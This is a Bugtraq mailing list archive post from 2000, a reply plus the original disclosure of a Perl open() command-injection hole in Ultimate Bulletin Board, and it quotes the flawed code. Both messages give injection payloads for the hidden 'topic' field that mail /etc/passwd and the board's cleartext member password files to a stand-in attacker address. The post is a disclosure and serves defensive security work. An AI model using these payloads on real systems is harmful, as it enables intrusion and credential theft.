Bugtraq mailing list archives

Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: khill () BIGFOOT COM (Kevin Hillabolt)
Date: Mon, 14 Feb 2000 18:46:11 -0600


It works on the full version also...

Little different syntax:
topic=012345.cgi|cat%20../Members/*|mail hacker () evil org|
(note the ../ on the Members.  You have to go up a directory to get the
file.  Maybe you could stop it via simple folder permissions??)

Regards,
Kevin Hillabolt

----- Original Message -----
From: "Sergei A. Golubchik" <serg () INFOMAG APE RELARN RU>
To: <BUGTRAQ () securityfocus com>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.

Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:

ubb_library.pl:901-902
          if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
          open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
writing it ? Girls ?)

And the $ThreadFile takes its value directly from the hidden (hmm!)
field `topic'.

So when I filled the form with
topic='012345.ubb|mail hacker () evil com </etc/passwd|'
It happily gives me /etc/passwd. And
topic='012345.ubb|cat Members/*|mail hacker () evil org|'
shows all users of bulletin board, and their passwords too (in

cleartext!).


So one should only open "reply" form in the forum, save it to disk,
and set topic field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).

The fix is obvious. But the rule of the thumb is "do not use magic perl

open".

At least in cgi scripts. If you want to open regular file, sysopen does
the trick as well.

And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified.

Current thread:

Re: perl-cgi hole in UltimateBB by Infopop Corp., (continued)
- - - Re: perl-cgi hole in UltimateBB by Infopop Corp. Brock Sides (Feb 17)
    - AUTORUN.INF Vulnerability Eric Stevens (Feb 17)
    - Re: AUTORUN.INF Vulnerability Jesper M. Johansson (Feb 18)
    - UPDATED: NetBSD Security Advisory 2000-001 Daniel Carosone (Feb 18)
    - Re: AUTORUN.INF Vulnerability Nick FitzGerald (Feb 19)
    - Re: AUTORUN.INF Vulnerability Valentin Pletzer (Feb 20)
    - MMDF Ran Atkinson (Feb 18)
    - Re: perl-cgi hole in UltimateBB by Infopop Corp. Brock Sides (Feb 18)
    - Re: perl-cgi hole in UltimateBB by Infopop Corp. Bennett Todd (Feb 18)
    - Re: perl-cgi hole in UltimateBB by Infopop Corp. Dennis Taylor (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Kevin Hillabolt (Feb 14)
  - AIX SNMP Defaults harikiri (Feb 15)
    - Re: AIX SNMP Defaults Michal Zalewski (Feb 17)
    - Re: AIX SNMP Defaults Troy Bollinger (Feb 21)
    - riched32.dll buffer overflow Pauli Ojanpera (Feb 21)
    - Re: AIX SNMP Defaults Troy Bollinger (Feb 17)
    - Security Bulletins Digest Aleph One (Feb 17)
  - Re: perl-cgi hole in UltimateBB by Infopop Corp. Jordan Ritter (Feb 15)
- Packet filter logging: MAC & TCP flags Jens Hektor (Feb 15)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Irwin Lazar (Feb 17)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Randal L. Schwartz (Feb 17)